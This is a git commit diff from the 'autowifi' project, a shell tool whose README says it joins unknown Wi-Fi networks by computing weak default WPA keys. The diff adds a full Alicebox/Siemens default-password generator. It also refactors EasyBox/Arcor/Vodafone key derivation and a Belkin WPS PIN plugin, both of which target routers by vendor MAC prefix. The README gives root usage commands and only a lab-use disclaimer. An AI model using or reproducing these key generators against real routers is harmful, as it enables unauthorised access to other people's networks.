diff options
| author | lassulus <lassulus@googlemail.com> | 2013-06-30 14:25:29 +0200 |
|---|---|---|
| committer | lassulus <lassulus@googlemail.com> | 2013-06-30 14:25:29 +0200 |
| commit | af1d85fa6b390f8119c4ba695b3f075bd726806e (patch) | |
| tree | 922822531854bfe6caf4a08e2b13a3cd400aade9 | |
| parent | 1d591aa1f4af30f41f2d44656d5b86e73048cffd (diff) | |
| parent | b99bbe256c030cec78b1c96d08eb02860dda911c (diff) | |
Merge branch 'master' of github.com:krebscode/autowifi
| -rw-r--r-- | README.md | 49 | ||||
| -rwxr-xr-x | usr/bin/autowifi | 8 | ||||
| -rwxr-xr-x | usr/bin/autowifi_dryrun | 42 | ||||
| -rw-r--r-- | usr/lib/autowifi/lib/plugin_core | 26 | ||||
| -rwxr-xr-x | usr/lib/autowifi/plugins/02alice | 20 | ||||
| -rwxr-xr-x | usr/lib/autowifi/plugins/02easybox | 19 | ||||
| -rwxr-xr-x | usr/lib/autowifi/plugins/11belkin_wps | 9 |
7 files changed, 122 insertions, 51 deletions
diff --git a/README.md b/README.md new file mode 100644 index 00000000..3e0d8dce --- /dev/null +++ b/README.md @@ -0,0 +1,49 @@ +# Autowifi +Author: makefu,lassulus + +Status: Pre-Alpha - it will most likely break if you try to use it + +# Contact + +twitter: @krebsbob ,@makefoo + +IRC: freenode #krebs + +# Goals +Goal of autowifi is to provide a tool which automatically can connect to +networks in an unknown environment. + +This can either be done by connecting to open networks, known networks +(whitelist) or by calculating weak default wpa keys (for example easybox +default passwords). + +# Audience +Due to the current status of the project the target audience are +linux users with technical background . + +# Usage + + # all as root + # try to find networks to connect to around you + usr/bin/autowifi_dryrun quiet + + # start the autowifi daemon which tries to stay in networks all the time + usr/bin/autowifi + +# Plugins +All tests to open up networks are implemented in plugins in + usr/lib/autowifi/plugins + +## Run a single Plugin +This can be used for testing purposes, e.g. test a single plugin against given networks directly + + # try out the easybox keygen + usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style) + + #e.g. + usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]" + +# Disclaimer +- use at own risk +- only run in lab environment +- you break it, you buy it diff --git a/usr/bin/autowifi b/usr/bin/autowifi index 5d9cad16..07786d67 100755 --- a/usr/bin/autowifi +++ b/usr/bin/autowifi @@ -63,7 +63,6 @@ find_count_of_ssid(){ connect_to_network_by_ssid(){ - wifi_init find_count_of_ssid "$1" | (while read i do loop_over_cracks "$i" && exit 0 @@ -76,7 +75,6 @@ connect_to_network_by_ssid(){ } connect_with_pw(){ - wifi_init find_count_of_ssid "$1" | (while read i do KEY="$2" @@ -92,8 +90,8 @@ wifi_init(){ . /tmp/${interface}.scan } loop_over_networks(){ - wifi_init + wifi_init for i in `seq 1 $WIFI_COUNT`; do loop_over_cracks "$i" if [ $? -eq 0 ]; then @@ -159,9 +157,7 @@ loop_cracks_over_networks(){ # exit 0 #} - - - +wifi_init if [ -n "$2" ]; then echo connecting to $1 with pw $2 connect_with_pw "$1" "$2" diff --git a/usr/bin/autowifi_dryrun b/usr/bin/autowifi_dryrun index 1df94119..c9867106 100755 --- a/usr/bin/autowifi_dryrun +++ b/usr/bin/autowifi_dryrun @@ -2,30 +2,23 @@ # ENV: # the root directory (e.g. root=$PWD/../../ if run from here ) cd $(dirname $(readlink -f $0)) -root=${root:-/} -wifi=${wifi:-wlan0} - test "${1:-}" = 'quiet' && exec 2>&- -# for iwlist_scan -. $root/usr/lib/autowifi/lib/iwlist +interface=${interface:-wlan0} +root=${root:-../../} +crackdir=$root/usr/lib/autowifi/plugins +wifi_keys=$root/etc/autowifi/wifi_keys +wifi_log=$root/var/log/autowifi.log -# . $ROOT/usr/lib/autowifi/lib/ +# exists() run_hooks() +. $root/usr/lib/autowifi/lib/core -# for check_internet and check_gateway -# . /usr/lib/autowifi/lib/network +# start_wpa_supplicant() +. $root/usr/lib/autowifi/lib/wpa_supplicant crack_wifi(){ - #SSID MAC CHANNEL ENCRYPTION WPA WPA2 - if [ "$4" == off ];then - encr=open - elif [ "$6" -eq 1 ]; then - encr=psk2 - elif [ "$5" -eq 1 ]; then - encr=psk - elif [ "$4" == on ]; then - encr=wep - fi + #SSID MAC FREQ ENCRYPTION + ALL_RET=1 for hack in $(find $root/usr/lib/autowifi/plugins -type f | sort -n); do printf "%s" "Trying $(basename $hack) against $1 : " >&2 @@ -41,13 +34,18 @@ crack_wifi(){ done return $ALL_RET } +wifi_init(){ + wpa_supplicant_is_usable || start_wpa_supplicant /tmp/autowifi.wpa_supplicant + wifi_scan > /tmp/${interface}.scan + . /tmp/${interface}.scan +} loop_over_networks(){ - . /tmp/${wifi}.scan - echo "SSID:MAC:CHANNEL:ENCRYPTION:key" + wifi_init + + echo "SSID:MAC:FREQ:ENCRYPTION:key" for i in `seq 1 $WIFI_COUNT`; do - eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} \${WPA_${i}} \${WPA2_${i}} + eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${FREQ_${i}} \${ENCRYPTION_${i}} done } -iwlist_scan > /tmp/${wifi}.scan loop_over_networks diff --git a/usr/lib/autowifi/lib/plugin_core b/usr/lib/autowifi/lib/plugin_core index da003350..1b83b0c3 100644 --- a/usr/lib/autowifi/lib/plugin_core +++ b/usr/lib/autowifi/lib/plugin_core @@ -1,24 +1,38 @@ +#!/bin/sh parse_plugin_args(){ [ $# -ne 4 ] && plugin_usage && exit 1 # convenience function to put args in ENV variables ESSID="$1" - MAC="$2" + + # mac is returned without colon + MAC=$(printf "%s" "$2" | sed 's/://g') + # split up the mac address to vendor and private part + VENDOR_MAC=${MAC:0:6} + PRIVATE_MAC=${MAC:6:12} CHANNEL="$3" ENC="$4" - if [ ${#MAC} -ne 17 ] ;then + if [ ${#MAC} -ne 12 ] ;then echo "MAC malformed" exit 1 fi } plugin_usage(){ cat << EOF -usage: $0 ESSID MAC CHANNEL ENC WPA WPA2" +usage: $0 ESSID MAC CHANNEL ENC" ESSID - string MAC - 00:11:22:33:44:55 - ENC - on | off - WPA - 0 | 1 - WPA2 - 0 | 1 + CHANNEL - 4 + ENC - wpa EOF } + +check_vendor_mac(){ + needle="$(printf $1 | tr '[A-Z]' '[a-z]')" + shift + for i in "$@";do + [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 + done + return 1 +} diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice new file mode 100755 index 00000000..1b4533a4 --- /dev/null +++ b/usr/lib/autowifi/plugins/02alice @@ -0,0 +1,20 @@ +#!/bin/sh +# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: +# Based on Poc from +# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html +# +# +# ESSID MAC CHANNEL ENCRYPTION + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 + +# printf always makes string to lower, need that for correct md5sum +ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) +TMP=$(printf $ETHMAC | md5sum) +printf ${TMP:0:12} | base64 +exit 0 diff --git a/usr/lib/autowifi/plugins/02easybox b/usr/lib/autowifi/plugins/02easybox index 2126e17c..3d7cb8c1 100755 --- a/usr/lib/autowifi/plugins/02easybox +++ b/usr/lib/autowifi/plugins/02easybox @@ -1,21 +1,20 @@ #!/bin/sh #ESSID MAC CHANNEL ENCRYPTION WPA WPA2 -if ! echo "$1" | egrep -qi "(EasyBox-|Arcor-|Vodafone-)"; then - exit 1 -else - MAC=${2?\$2 must be MAC} - # Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal. +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core +parse_plugin_args "$@" - take5=${MAC:12} - last4=${take5/:/} +if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then + echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" + exit 1 +else # Fill up to 4 places with zeros, if necessary: - deci=$(printf "%04d" "0x$last4" | sed 's/.*\(....\)/\1/;s/./& /g') - #echo M4: ${deci[@]} + deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') # # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: - hexi=$(echo ${MAC:12:5} | sed 's/://;s/./& /g') + hexi=$(echo ${MAC:8:4} | sed 's/./& /g') #echo 'M4 (Hex): ' ${hexi[@]} # K1 = last byte of (d0 + d1 + h2 + h3) # K2 = last byte of (h0 + h1 + d2 + d3) diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps index 82140523..65e08624 100755 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ b/usr/lib/autowifi/plugins/11belkin_wps @@ -15,13 +15,8 @@ cd $(dirname $(readlink -f $0)) . ../lib/wps parse_plugin_args "$@" -MAC=$(printf "%s" $MAC| sed 's/://g') -VENDOR_MAC=${MAC:0:6} -PRIVATE_MAC=${MAC:6:12} -if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then - echo "VENDOR MAC $VENDOR_MAC not affected" - exit 1 -fi + +! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 calc_belkin(){ PRIVATE_MAC=${1} |